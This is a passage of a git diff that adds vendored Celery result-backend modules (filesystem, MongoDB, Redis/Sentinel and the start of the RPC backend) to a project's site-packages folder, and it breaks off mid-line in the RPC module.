+ + Arguments: + url (str): URL to the directory we should use + open (Callable): open function to use when opening files + unlink (Callable): unlink function to use when deleting files + sep (str): directory separator (to join the directory with the key) + encoding (str): encoding used on the file-system + """ + + def __init__(self, url=None, open=open, unlink=os.unlink, sep=os.sep, + encoding=default_encoding, *args, **kwargs): + super().__init__(*args, **kwargs) + self.url = url + path = self._find_path(url) + + # Remove forwarding "/" for Windows os + if os.name == "nt" and path.startswith("/"): + path = path[1:] + + # We need the path and separator as bytes objects + self.path = path.encode(encoding) + self.sep = sep.encode(encoding) + + self.open = open + self.unlink = unlink + + # Lets verify that we've everything setup right + self._do_directory_test(b'.fs-backend-' + uuid().encode(encoding)) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__(args, {**kwargs, 'url': self.url}) + + def _find_path(self, url): + if not url: + raise ImproperlyConfigured(E_NO_PATH_SET) + if url.startswith('file://localhost/'): + return url[16:] + if url.startswith('file://'): + return url[7:] + raise ImproperlyConfigured(E_PATH_NON_CONFORMING_SCHEME) + + def _do_directory_test(self, key): + try: + self.set(key, b'test value') + assert self.get(key) == b'test value' + self.delete(key) + except OSError: + raise ImproperlyConfigured(E_PATH_INVALID) + + def _filename(self, key): + return self.sep.join((self.path, key)) + + def get(self, key): + try: + with self.open(self._filename(key), 'rb') as infile: + return infile.read() + except FileNotFoundError: + pass + + def set(self, key, value): + with self.open(self._filename(key), 'wb') as outfile: + outfile.write(ensure_bytes(value)) + + def mget(self, keys): + for key in keys: + yield self.get(key) + + def delete(self, key): + self.unlink(self._filename(key)) + + def cleanup(self): + """Delete expired meta-data.""" + if not self.expires: + return + epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone) + now_ts = (self.app.now() - epoch).total_seconds() + cutoff_ts = now_ts - self.expires + for filename in os.listdir(self.path): + for prefix in (self.task_keyprefix, self.group_keyprefix, + self.chord_keyprefix): + if filename.startswith(prefix): + path = os.path.join(self.path, filename) + if os.stat(path).st_mtime < cutoff_ts: + self.unlink(path) + break diff --git a/env/Lib/site-packages/celery/backends/mongodb.py b/env/Lib/site-packages/celery/backends/mongodb.py new file mode 100644 index 00000000..c64fe380 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/mongodb.py @@ -0,0 +1,333 @@ +"""MongoDB result store backend.""" +from datetime import datetime, timedelta + +from kombu.exceptions import EncodeError +from kombu.utils.objects import cached_property +from kombu.utils.url import maybe_sanitize_url, urlparse + +from celery import states +from celery.exceptions import ImproperlyConfigured + +from .base import BaseBackend + +try: + import pymongo +except ImportError: + pymongo = None + +if pymongo: + try: + from bson.binary import Binary + except ImportError: + from pymongo.binary import Binary + from pymongo.errors import InvalidDocument +else: # pragma: no cover + Binary = None + + class InvalidDocument(Exception): + pass + +__all__ = ('MongoBackend',) + +BINARY_CODECS = frozenset(['pickle', 'msgpack']) + + +class MongoBackend(BaseBackend): + """MongoDB result backend. 
+ + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`pymongo` is not available. + """ + + mongo_host = None + host = 'localhost' + port = 27017 + user = None + password = None + database_name = 'celery' + taskmeta_collection = 'celery_taskmeta' + groupmeta_collection = 'celery_groupmeta' + max_pool_size = 10 + options = None + + supports_autoexpire = False + + _connection = None + + def __init__(self, app=None, **kwargs): + self.options = {} + + super().__init__(app, **kwargs) + + if not pymongo: + raise ImproperlyConfigured( + 'You need to install the pymongo library to use the ' + 'MongoDB backend.') + + # Set option defaults + for key, value in self._prepare_client_options().items(): + self.options.setdefault(key, value) + + # update conf with mongo uri data, only if uri was given + if self.url: + self.url = self._ensure_mongodb_uri_compliance(self.url) + + uri_data = pymongo.uri_parser.parse_uri(self.url) + # build the hosts list to create a mongo connection + hostslist = [ + f'{x[0]}:{x[1]}' for x in uri_data['nodelist'] + ] + self.user = uri_data['username'] + self.password = uri_data['password'] + self.mongo_host = hostslist + if uri_data['database']: + # if no database is provided in the uri, use default + self.database_name = uri_data['database'] + + self.options.update(uri_data['options']) + + # update conf with specific settings + config = self.app.conf.get('mongodb_backend_settings') + if config is not None: + if not isinstance(config, dict): + raise ImproperlyConfigured( + 'MongoDB backend settings should be grouped in a dict') + config = dict(config) # don't modify original + + if 'host' in config or 'port' in config: + # these should take over uri conf + self.mongo_host = None + + self.host = config.pop('host', self.host) + self.port = config.pop('port', self.port) + self.mongo_host = config.pop('mongo_host', self.mongo_host) + self.user = config.pop('user', self.user) + self.password = config.pop('password', self.password) + self.database_name = config.pop('database', self.database_name) + self.taskmeta_collection = config.pop( + 'taskmeta_collection', self.taskmeta_collection, + ) + self.groupmeta_collection = config.pop( + 'groupmeta_collection', self.groupmeta_collection, + ) + + self.options.update(config.pop('options', {})) + self.options.update(config) + + @staticmethod + def _ensure_mongodb_uri_compliance(url): + parsed_url = urlparse(url) + if not parsed_url.scheme.startswith('mongodb'): + url = f'mongodb+{url}' + + if url == 'mongodb://': + url += 'localhost' + + return url + + def _prepare_client_options(self): + if pymongo.version_tuple >= (3,): + return {'maxPoolSize': self.max_pool_size} + else: # pragma: no cover + return {'max_pool_size': self.max_pool_size, + 'auto_start_request': False} + + def _get_connection(self): + """Connect to the MongoDB server.""" + if self._connection is None: + from pymongo import MongoClient + + host = self.mongo_host + if not host: + # The first pymongo.Connection() argument (host) can be + # a list of ['host:port'] elements or a mongodb connection + # URI. If this is the case, don't use self.port + # but let pymongo get the port(s) from the URI instead. + # This enables the use of replica sets and sharding. + # See pymongo.Connection() for more info. 
+ host = self.host + if isinstance(host, str) \ + and not host.startswith('mongodb://'): + host = f'mongodb://{host}:{self.port}' + # don't change self.options + conf = dict(self.options) + conf['host'] = host + if self.user: + conf['username'] = self.user + if self.password: + conf['password'] = self.password + + self._connection = MongoClient(**conf) + + return self._connection + + def encode(self, data): + if self.serializer == 'bson': + # mongodb handles serialization + return data + payload = super().encode(data) + + # serializer which are in a unsupported format (pickle/binary) + if self.serializer in BINARY_CODECS: + payload = Binary(payload) + return payload + + def decode(self, data): + if self.serializer == 'bson': + return data + return super().decode(data) + + def _store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Store return value and state of an executed task.""" + meta = self._get_result_meta(result=self.encode(result), state=state, + traceback=traceback, request=request, + format_date=False) + # Add the _id for mongodb + meta['_id'] = task_id + + try: + self.collection.replace_one({'_id': task_id}, meta, upsert=True) + except InvalidDocument as exc: + raise EncodeError(exc) + + return result + + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + obj = self.collection.find_one({'_id': task_id}) + if obj: + if self.app.conf.find_value_for_key('extended', 'result'): + return self.meta_from_decoded({ + 'name': obj['name'], + 'args': obj['args'], + 'task_id': obj['_id'], + 'queue': obj['queue'], + 'kwargs': obj['kwargs'], + 'status': obj['status'], + 'worker': obj['worker'], + 'retries': obj['retries'], + 'children': obj['children'], + 'date_done': obj['date_done'], + 'traceback': obj['traceback'], + 'result': self.decode(obj['result']), + }) + return self.meta_from_decoded({ + 'task_id': obj['_id'], + 'status': obj['status'], + 'result': self.decode(obj['result']), + 'date_done': obj['date_done'], + 'traceback': obj['traceback'], + 'children': obj['children'], + }) + return {'status': states.PENDING, 'result': None} + + def _save_group(self, group_id, result): + """Save the group result.""" + meta = { + '_id': group_id, + 'result': self.encode([i.id for i in result]), + 'date_done': datetime.utcnow(), + } + self.group_collection.replace_one({'_id': group_id}, meta, upsert=True) + return result + + def _restore_group(self, group_id): + """Get the result for a group by id.""" + obj = self.group_collection.find_one({'_id': group_id}) + if obj: + return { + 'task_id': obj['_id'], + 'date_done': obj['date_done'], + 'result': [ + self.app.AsyncResult(task) + for task in self.decode(obj['result']) + ], + } + + def _delete_group(self, group_id): + """Delete a group by id.""" + self.group_collection.delete_one({'_id': group_id}) + + def _forget(self, task_id): + """Remove result from MongoDB. + + Raises: + pymongo.exceptions.OperationsError: + if the task_id could not be removed. + """ + # By using safe=True, this will wait until it receives a response from + # the server. Likewise, it will raise an OperationsError if the + # response was unable to be completed. 
+ self.collection.delete_one({'_id': task_id}) + + def cleanup(self): + """Delete expired meta-data.""" + if not self.expires: + return + + self.collection.delete_many( + {'date_done': {'$lt': self.app.now() - self.expires_delta}}, + ) + self.group_collection.delete_many( + {'date_done': {'$lt': self.app.now() - self.expires_delta}}, + ) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__( + args, dict(kwargs, expires=self.expires, url=self.url)) + + def _get_database(self): + conn = self._get_connection() + return conn[self.database_name] + + @cached_property + def database(self): + """Get database from MongoDB connection. + + performs authentication if necessary. + """ + return self._get_database() + + @cached_property + def collection(self): + """Get the meta-data task collection.""" + collection = self.database[self.taskmeta_collection] + + # Ensure an index on date_done is there, if not process the index + # in the background. Once completed cleanup will be much faster + collection.create_index('date_done', background=True) + return collection + + @cached_property + def group_collection(self): + """Get the meta-data task collection.""" + collection = self.database[self.groupmeta_collection] + + # Ensure an index on date_done is there, if not process the index + # in the background. Once completed cleanup will be much faster + collection.create_index('date_done', background=True) + return collection + + @cached_property + def expires_delta(self): + return timedelta(seconds=self.expires) + + def as_uri(self, include_password=False): + """Return the backend as an URI. + + Arguments: + include_password (bool): Password censored if disabled. + """ + if not self.url: + return 'mongodb://' + if include_password: + return self.url + + if ',' not in self.url: + return maybe_sanitize_url(self.url) + + uri1, remainder = self.url.split(',', 1) + return ','.join([maybe_sanitize_url(uri1), remainder]) diff --git a/env/Lib/site-packages/celery/backends/redis.py b/env/Lib/site-packages/celery/backends/redis.py new file mode 100644 index 00000000..8acc6083 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/redis.py @@ -0,0 +1,668 @@ +"""Redis result store backend.""" +import time +from contextlib import contextmanager +from functools import partial +from ssl import CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED +from urllib.parse import unquote + +from kombu.utils.functional import retry_over_time +from kombu.utils.objects import cached_property +from kombu.utils.url import _parse_url, maybe_sanitize_url + +from celery import states +from celery._state import task_join_will_block +from celery.canvas import maybe_signature +from celery.exceptions import BackendStoreError, ChordError, ImproperlyConfigured +from celery.result import GroupResult, allow_join_result +from celery.utils.functional import _regen, dictfilter +from celery.utils.log import get_logger +from celery.utils.time import humanize_seconds + +from .asynchronous import AsyncBackendMixin, BaseResultConsumer +from .base import BaseKeyValueStoreBackend + +try: + import redis.connection + from kombu.transport.redis import get_redis_error_classes +except ImportError: + redis = None + get_redis_error_classes = None + +try: + import redis.sentinel +except ImportError: + pass + +__all__ = ('RedisBackend', 'SentinelBackend') + +E_REDIS_MISSING = """ +You need to install the redis library in order to use \ +the Redis result store backend. 
+""" + +E_REDIS_SENTINEL_MISSING = """ +You need to install the redis library with support of \ +sentinel in order to use the Redis result store backend. +""" + +W_REDIS_SSL_CERT_OPTIONAL = """ +Setting ssl_cert_reqs=CERT_OPTIONAL when connecting to redis means that \ +celery might not validate the identity of the redis broker when connecting. \ +This leaves you vulnerable to man in the middle attacks. +""" + +W_REDIS_SSL_CERT_NONE = """ +Setting ssl_cert_reqs=CERT_NONE when connecting to redis means that celery \ +will not validate the identity of the redis broker when connecting. This \ +leaves you vulnerable to man in the middle attacks. +""" + +E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH = """ +SSL connection parameters have been provided but the specified URL scheme \ +is redis://. A Redis SSL connection URL should use the scheme rediss://. +""" + +E_REDIS_SSL_CERT_REQS_MISSING_INVALID = """ +A rediss:// URL must have parameter ssl_cert_reqs and this must be set to \ +CERT_REQUIRED, CERT_OPTIONAL, or CERT_NONE +""" + +E_LOST = 'Connection to Redis lost: Retry (%s/%s) %s.' + +E_RETRY_LIMIT_EXCEEDED = """ +Retry limit exceeded while trying to reconnect to the Celery redis result \ +store backend. The Celery application must be restarted. +""" + +logger = get_logger(__name__) + + +class ResultConsumer(BaseResultConsumer): + _pubsub = None + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._get_key_for_task = self.backend.get_key_for_task + self._decode_result = self.backend.decode_result + self._ensure = self.backend.ensure + self._connection_errors = self.backend.connection_errors + self.subscribed_to = set() + + def on_after_fork(self): + try: + self.backend.client.connection_pool.reset() + if self._pubsub is not None: + self._pubsub.close() + except KeyError as e: + logger.warning(str(e)) + super().on_after_fork() + + def _reconnect_pubsub(self): + self._pubsub = None + self.backend.client.connection_pool.reset() + # task state might have changed when the connection was down so we + # retrieve meta for all subscribed tasks before going into pubsub mode + if self.subscribed_to: + metas = self.backend.client.mget(self.subscribed_to) + metas = [meta for meta in metas if meta] + for meta in metas: + self.on_state_change(self._decode_result(meta), None) + self._pubsub = self.backend.client.pubsub( + ignore_subscribe_messages=True, + ) + # subscribed_to maybe empty after on_state_change + if self.subscribed_to: + self._pubsub.subscribe(*self.subscribed_to) + else: + self._pubsub.connection = self._pubsub.connection_pool.get_connection( + 'pubsub', self._pubsub.shard_hint + ) + # even if there is nothing to subscribe, we should not lose the callback after connecting. + # The on_connect callback will re-subscribe to any channels we previously subscribed to. 
+ self._pubsub.connection.register_connect_callback(self._pubsub.on_connect) + + @contextmanager + def reconnect_on_error(self): + try: + yield + except self._connection_errors: + try: + self._ensure(self._reconnect_pubsub, ()) + except self._connection_errors: + logger.critical(E_RETRY_LIMIT_EXCEEDED) + raise + + def _maybe_cancel_ready_task(self, meta): + if meta['status'] in states.READY_STATES: + self.cancel_for(meta['task_id']) + + def on_state_change(self, meta, message): + super().on_state_change(meta, message) + self._maybe_cancel_ready_task(meta) + + def start(self, initial_task_id, **kwargs): + self._pubsub = self.backend.client.pubsub( + ignore_subscribe_messages=True, + ) + self._consume_from(initial_task_id) + + def on_wait_for_pending(self, result, **kwargs): + for meta in result._iter_meta(**kwargs): + if meta is not None: + self.on_state_change(meta, None) + + def stop(self): + if self._pubsub is not None: + self._pubsub.close() + + def drain_events(self, timeout=None): + if self._pubsub: + with self.reconnect_on_error(): + message = self._pubsub.get_message(timeout=timeout) + if message and message['type'] == 'message': + self.on_state_change(self._decode_result(message['data']), message) + elif timeout: + time.sleep(timeout) + + def consume_from(self, task_id): + if self._pubsub is None: + return self.start(task_id) + self._consume_from(task_id) + + def _consume_from(self, task_id): + key = self._get_key_for_task(task_id) + if key not in self.subscribed_to: + self.subscribed_to.add(key) + with self.reconnect_on_error(): + self._pubsub.subscribe(key) + + def cancel_for(self, task_id): + key = self._get_key_for_task(task_id) + self.subscribed_to.discard(key) + if self._pubsub: + with self.reconnect_on_error(): + self._pubsub.unsubscribe(key) + + +class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin): + """Redis task result store. + + It makes use of the following commands: + GET, MGET, DEL, INCRBY, EXPIRE, SET, SETEX + """ + + ResultConsumer = ResultConsumer + + #: :pypi:`redis` client module. + redis = redis + connection_class_ssl = redis.SSLConnection if redis else None + + #: Maximum number of connections in the pool. + max_connections = None + + supports_autoexpire = True + supports_native_join = True + + #: Maximal length of string value in Redis. 
+ #: 512 MB - https://redis.io/topics/data-types + _MAX_STR_VALUE_SIZE = 536870912 + + def __init__(self, host=None, port=None, db=None, password=None, + max_connections=None, url=None, + connection_pool=None, **kwargs): + super().__init__(expires_type=int, **kwargs) + _get = self.app.conf.get + if self.redis is None: + raise ImproperlyConfigured(E_REDIS_MISSING.strip()) + + if host and '://' in host: + url, host = host, None + + self.max_connections = ( + max_connections or + _get('redis_max_connections') or + self.max_connections) + self._ConnectionPool = connection_pool + + socket_timeout = _get('redis_socket_timeout') + socket_connect_timeout = _get('redis_socket_connect_timeout') + retry_on_timeout = _get('redis_retry_on_timeout') + socket_keepalive = _get('redis_socket_keepalive') + health_check_interval = _get('redis_backend_health_check_interval') + + self.connparams = { + 'host': _get('redis_host') or 'localhost', + 'port': _get('redis_port') or 6379, + 'db': _get('redis_db') or 0, + 'password': _get('redis_password'), + 'max_connections': self.max_connections, + 'socket_timeout': socket_timeout and float(socket_timeout), + 'retry_on_timeout': retry_on_timeout or False, + 'socket_connect_timeout': + socket_connect_timeout and float(socket_connect_timeout), + } + + username = _get('redis_username') + if username: + # We're extra careful to avoid including this configuration value + # if it wasn't specified since older versions of py-redis + # don't support specifying a username. + # Only Redis>6.0 supports username/password authentication. + + # TODO: Include this in connparams' definition once we drop + # support for py-redis<3.4.0. + self.connparams['username'] = username + + if health_check_interval: + self.connparams["health_check_interval"] = health_check_interval + + # absent in redis.connection.UnixDomainSocketConnection + if socket_keepalive: + self.connparams['socket_keepalive'] = socket_keepalive + + # "redis_backend_use_ssl" must be a dict with the keys: + # 'ssl_cert_reqs', 'ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile' + # (the same as "broker_use_ssl") + ssl = _get('redis_backend_use_ssl') + if ssl: + self.connparams.update(ssl) + self.connparams['connection_class'] = self.connection_class_ssl + + if url: + self.connparams = self._params_from_url(url, self.connparams) + + # If we've received SSL parameters via query string or the + # redis_backend_use_ssl dict, check ssl_cert_reqs is valid. 
If set + # via query string ssl_cert_reqs will be a string so convert it here + if ('connection_class' in self.connparams and + issubclass(self.connparams['connection_class'], redis.SSLConnection)): + ssl_cert_reqs_missing = 'MISSING' + ssl_string_to_constant = {'CERT_REQUIRED': CERT_REQUIRED, + 'CERT_OPTIONAL': CERT_OPTIONAL, + 'CERT_NONE': CERT_NONE, + 'required': CERT_REQUIRED, + 'optional': CERT_OPTIONAL, + 'none': CERT_NONE} + ssl_cert_reqs = self.connparams.get('ssl_cert_reqs', ssl_cert_reqs_missing) + ssl_cert_reqs = ssl_string_to_constant.get(ssl_cert_reqs, ssl_cert_reqs) + if ssl_cert_reqs not in ssl_string_to_constant.values(): + raise ValueError(E_REDIS_SSL_CERT_REQS_MISSING_INVALID) + + if ssl_cert_reqs == CERT_OPTIONAL: + logger.warning(W_REDIS_SSL_CERT_OPTIONAL) + elif ssl_cert_reqs == CERT_NONE: + logger.warning(W_REDIS_SSL_CERT_NONE) + self.connparams['ssl_cert_reqs'] = ssl_cert_reqs + + self.url = url + + self.connection_errors, self.channel_errors = ( + get_redis_error_classes() if get_redis_error_classes + else ((), ())) + self.result_consumer = self.ResultConsumer( + self, self.app, self.accept, + self._pending_results, self._pending_messages, + ) + + def _params_from_url(self, url, defaults): + scheme, host, port, username, password, path, query = _parse_url(url) + connparams = dict( + defaults, **dictfilter({ + 'host': host, 'port': port, 'username': username, + 'password': password, 'db': query.pop('virtual_host', None)}) + ) + + if scheme == 'socket': + # use 'path' as path to the socket… in this case + # the database number should be given in 'query' + connparams.update({ + 'connection_class': self.redis.UnixDomainSocketConnection, + 'path': '/' + path, + }) + # host+port are invalid options when using this connection type. + connparams.pop('host', None) + connparams.pop('port', None) + connparams.pop('socket_connect_timeout') + else: + connparams['db'] = path + + ssl_param_keys = ['ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile', + 'ssl_cert_reqs'] + + if scheme == 'redis': + # If connparams or query string contain ssl params, raise error + if (any(key in connparams for key in ssl_param_keys) or + any(key in query for key in ssl_param_keys)): + raise ValueError(E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH) + + if scheme == 'rediss': + connparams['connection_class'] = redis.SSLConnection + # The following parameters, if present in the URL, are encoded. We + # must add the decoded values to connparams. + for ssl_setting in ssl_param_keys: + ssl_val = query.pop(ssl_setting, None) + if ssl_val: + connparams[ssl_setting] = unquote(ssl_val) + + # db may be string and start with / like in kombu. 
+ db = connparams.get('db') or 0 + db = db.strip('/') if isinstance(db, str) else db + connparams['db'] = int(db) + + for key, value in query.items(): + if key in redis.connection.URL_QUERY_ARGUMENT_PARSERS: + query[key] = redis.connection.URL_QUERY_ARGUMENT_PARSERS[key]( + value + ) + + # Query parameters override other parameters + connparams.update(query) + return connparams + + @cached_property + def retry_policy(self): + retry_policy = super().retry_policy + if "retry_policy" in self._transport_options: + retry_policy = retry_policy.copy() + retry_policy.update(self._transport_options['retry_policy']) + + return retry_policy + + def on_task_call(self, producer, task_id): + if not task_join_will_block(): + self.result_consumer.consume_from(task_id) + + def get(self, key): + return self.client.get(key) + + def mget(self, keys): + return self.client.mget(keys) + + def ensure(self, fun, args, **policy): + retry_policy = dict(self.retry_policy, **policy) + max_retries = retry_policy.get('max_retries') + return retry_over_time( + fun, self.connection_errors, args, {}, + partial(self.on_connection_error, max_retries), + **retry_policy) + + def on_connection_error(self, max_retries, exc, intervals, retries): + tts = next(intervals) + logger.error( + E_LOST.strip(), + retries, max_retries or 'Inf', humanize_seconds(tts, 'in ')) + return tts + + def set(self, key, value, **retry_policy): + if isinstance(value, str) and len(value) > self._MAX_STR_VALUE_SIZE: + raise BackendStoreError('value too large for Redis backend') + + return self.ensure(self._set, (key, value), **retry_policy) + + def _set(self, key, value): + with self.client.pipeline() as pipe: + if self.expires: + pipe.setex(key, self.expires, value) + else: + pipe.set(key, value) + pipe.publish(key, value) + pipe.execute() + + def forget(self, task_id): + super().forget(task_id) + self.result_consumer.cancel_for(task_id) + + def delete(self, key): + self.client.delete(key) + + def incr(self, key): + return self.client.incr(key) + + def expire(self, key, value): + return self.client.expire(key, value) + + def add_to_chord(self, group_id, result): + self.client.incr(self.get_key_for_group(group_id, '.t'), 1) + + def _unpack_chord_result(self, tup, decode, + EXCEPTION_STATES=states.EXCEPTION_STATES, + PROPAGATE_STATES=states.PROPAGATE_STATES): + _, tid, state, retval = decode(tup) + if state in EXCEPTION_STATES: + retval = self.exception_to_python(retval) + if state in PROPAGATE_STATES: + raise ChordError(f'Dependency {tid} raised {retval!r}') + return retval + + def set_chord_size(self, group_id, chord_size): + self.set(self.get_key_for_group(group_id, '.s'), chord_size) + + def apply_chord(self, header_result_args, body, **kwargs): + # If any of the child results of this chord are complex (ie. group + # results themselves), we need to save `header_result` to ensure that + # the expected structure is retained when we finish the chord and pass + # the results onward to the body in `on_chord_part_return()`. We don't + # do this is all cases to retain an optimisation in the common case + # where a chord header is comprised of simple result objects. 
+ if not isinstance(header_result_args[1], _regen): + header_result = self.app.GroupResult(*header_result_args) + if any(isinstance(nr, GroupResult) for nr in header_result.results): + header_result.save(backend=self) + + @cached_property + def _chord_zset(self): + return self._transport_options.get('result_chord_ordered', True) + + @cached_property + def _transport_options(self): + return self.app.conf.get('result_backend_transport_options', {}) + + def on_chord_part_return(self, request, state, result, + propagate=None, **kwargs): + app = self.app + tid, gid, group_index = request.id, request.group, request.group_index + if not gid or not tid: + return + if group_index is None: + group_index = '+inf' + + client = self.client + jkey = self.get_key_for_group(gid, '.j') + tkey = self.get_key_for_group(gid, '.t') + skey = self.get_key_for_group(gid, '.s') + result = self.encode_result(result, state) + encoded = self.encode([1, tid, state, result]) + with client.pipeline() as pipe: + pipeline = ( + pipe.zadd(jkey, {encoded: group_index}).zcount(jkey, "-inf", "+inf") + if self._chord_zset + else pipe.rpush(jkey, encoded).llen(jkey) + ).get(tkey).get(skey) + if self.expires: + pipeline = pipeline \ + .expire(jkey, self.expires) \ + .expire(tkey, self.expires) \ + .expire(skey, self.expires) + + _, readycount, totaldiff, chord_size_bytes = pipeline.execute()[:4] + + totaldiff = int(totaldiff or 0) + + if chord_size_bytes: + try: + callback = maybe_signature(request.chord, app=app) + total = int(chord_size_bytes) + totaldiff + if readycount == total: + header_result = GroupResult.restore(gid) + if header_result is not None: + # If we manage to restore a `GroupResult`, then it must + # have been complex and saved by `apply_chord()` earlier. + # + # Before we can join the `GroupResult`, it needs to be + # manually marked as ready to avoid blocking + header_result.on_ready() + # We'll `join()` it to get the results and ensure they are + # structured as intended rather than the flattened version + # we'd construct without any other information. + join_func = ( + header_result.join_native + if header_result.supports_native_join + else header_result.join + ) + with allow_join_result(): + resl = join_func( + timeout=app.conf.result_chord_join_timeout, + propagate=True + ) + else: + # Otherwise simply extract and decode the results we + # stashed along the way, which should be faster for large + # numbers of simple results in the chord header. 
+ decode, unpack = self.decode, self._unpack_chord_result + with client.pipeline() as pipe: + if self._chord_zset: + pipeline = pipe.zrange(jkey, 0, -1) + else: + pipeline = pipe.lrange(jkey, 0, total) + resl, = pipeline.execute() + resl = [unpack(tup, decode) for tup in resl] + try: + callback.delay(resl) + except Exception as exc: # pylint: disable=broad-except + logger.exception( + 'Chord callback for %r raised: %r', request.group, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'Callback error: {exc!r}'), + ) + finally: + with client.pipeline() as pipe: + pipe \ + .delete(jkey) \ + .delete(tkey) \ + .delete(skey) \ + .execute() + except ChordError as exc: + logger.exception('Chord %r raised: %r', request.group, exc) + return self.chord_error_from_stack(callback, exc) + except Exception as exc: # pylint: disable=broad-except + logger.exception('Chord %r raised: %r', request.group, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'Join error: {exc!r}'), + ) + + def _create_client(self, **params): + return self._get_client()( + connection_pool=self._get_pool(**params), + ) + + def _get_client(self): + return self.redis.StrictRedis + + def _get_pool(self, **params): + return self.ConnectionPool(**params) + + @property + def ConnectionPool(self): + if self._ConnectionPool is None: + self._ConnectionPool = self.redis.ConnectionPool + return self._ConnectionPool + + @cached_property + def client(self): + return self._create_client(**self.connparams) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__( + args, dict(kwargs, expires=self.expires, url=self.url)) + + +if getattr(redis, "sentinel", None): + class SentinelManagedSSLConnection( + redis.sentinel.SentinelManagedConnection, + redis.SSLConnection): + """Connect to a Redis server using Sentinel + TLS. + + Use Sentinel to identify which Redis server is the current master + to connect to and when connecting to the Master server, use an + SSL Connection. 
+ """ + + +class SentinelBackend(RedisBackend): + """Redis sentinel task result store.""" + + # URL looks like `sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3` + _SERVER_URI_SEPARATOR = ";" + + sentinel = getattr(redis, "sentinel", None) + connection_class_ssl = SentinelManagedSSLConnection if sentinel else None + + def __init__(self, *args, **kwargs): + if self.sentinel is None: + raise ImproperlyConfigured(E_REDIS_SENTINEL_MISSING.strip()) + + super().__init__(*args, **kwargs) + + def as_uri(self, include_password=False): + """Return the server addresses as URIs, sanitizing the password or not.""" + # Allow superclass to do work if we don't need to force sanitization + if include_password: + return super().as_uri( + include_password=include_password, + ) + # Otherwise we need to ensure that all components get sanitized rather + # by passing them one by one to the `kombu` helper + uri_chunks = ( + maybe_sanitize_url(chunk) + for chunk in (self.url or "").split(self._SERVER_URI_SEPARATOR) + ) + # Similar to the superclass, strip the trailing slash from URIs with + # all components empty other than the scheme + return self._SERVER_URI_SEPARATOR.join( + uri[:-1] if uri.endswith(":///") else uri + for uri in uri_chunks + ) + + def _params_from_url(self, url, defaults): + chunks = url.split(self._SERVER_URI_SEPARATOR) + connparams = dict(defaults, hosts=[]) + for chunk in chunks: + data = super()._params_from_url( + url=chunk, defaults=defaults) + connparams['hosts'].append(data) + for param in ("host", "port", "db", "password"): + connparams.pop(param) + + # Adding db/password in connparams to connect to the correct instance + for param in ("db", "password"): + if connparams['hosts'] and param in connparams['hosts'][0]: + connparams[param] = connparams['hosts'][0].get(param) + return connparams + + def _get_sentinel_instance(self, **params): + connparams = params.copy() + + hosts = connparams.pop("hosts") + min_other_sentinels = self._transport_options.get("min_other_sentinels", 0) + sentinel_kwargs = self._transport_options.get("sentinel_kwargs", {}) + + sentinel_instance = self.sentinel.Sentinel( + [(cp['host'], cp['port']) for cp in hosts], + min_other_sentinels=min_other_sentinels, + sentinel_kwargs=sentinel_kwargs, + **connparams) + + return sentinel_instance + + def _get_pool(self, **params): + sentinel_instance = self._get_sentinel_instance(**params) + + master_name = self._transport_options.get("master_name", None) + + return sentinel_instance.master_for( + service_name=master_name, + redis_class=self._get_client(), + ).connection_pool diff --git a/env/Lib/site-packages/celery/backends/rpc.py b/env/Lib/site-packages/celery/backends/rpc.py new file mode 100644 index 00000000..399c1dc7 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/rpc.py @@ -0,0 +1,342 @@ +"""The ``RPC`` result backend for AMQP brokers. + +RPC-style result backend, using reply-to and one queue per client. +""" +import time + +import kombu +from kombu.common import maybe_declare +from kombu.utils.compat import register_after_fork +from kombu.utils.objects import cached_property + +from celery import states +from celery._state import current_task, task_join_will_block + +from . import base +from .asynchronous import AsyncBackendMixin, BaseResultConsumer + +__all__ = ('BacklogLimitExceeded', 'RPCBackend') + +E_NO_CHORD_SUPPORT = """ +The "rpc" result backend does not support chords! + +Note that a group chained with a task is also upgraded to be a chord, +as this pattern requires synchronization. 
+ +Result backends that supports chords: Redis, Database, Memcached, and more. +""" + + +class BacklogLimitExceeded(Exception): + """Too much state history to fast-forward.""" + + +def _on_after_fork_cleanup_backend(backend): + backend._after_fork() + + +class ResultConsumer(BaseResultConsumer): + Consumer = kombu.Consumer + + _connection = None + _consumer = None + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._create_binding = self.backend._create_binding + + def start(self, initial_task_id, no_ack=True, **kwargs): + self._connection = self.app.connection() + initial_queue = self._create_binding(initial_task_id) + self._consumer = self.Consumer( + self._connection.default_channel, [initial_queue], + callbacks=[self.on_state_change], no_ack=no_ack, + accept=self.accept) + self._consumer.consume() + + def drain_events(self, timeout=None): + if self._connection: + return self._connection.drain_events(timeout=timeout) + elif timeout: + time.sleep(timeout) + + def stop(self): + try: + self._consumer.cancel() + finally: + self._connection.close() + + def on_after_fork(self): + self._consumer = None + if self._connection is not None: + self._connection.collect() + self._connection = None + + def consume_from(self, task_id): + if self._consumer is None: + return self.start(task_id) + queue = self._create_binding(task_id) + if not self._consumer.consuming_from(queue): + self._consumer.add_queue(queue) + self._consumer.consume() + + def cancel_for(self, task_id): + if self._consumer: + self._consumer.cancel_by_queue(self._create_binding(task_id).name) + + +class RPCBackend(base.Backend, AsyncBackendMixin): + """Base class for the RPC result backend.""" + + Exchange = kombu.Exchange + Producer = kombu.Producer + ResultConsumer = ResultConsumer + + #: Exception raised when there are too many messages for a task id. + BacklogLimitExceeded = 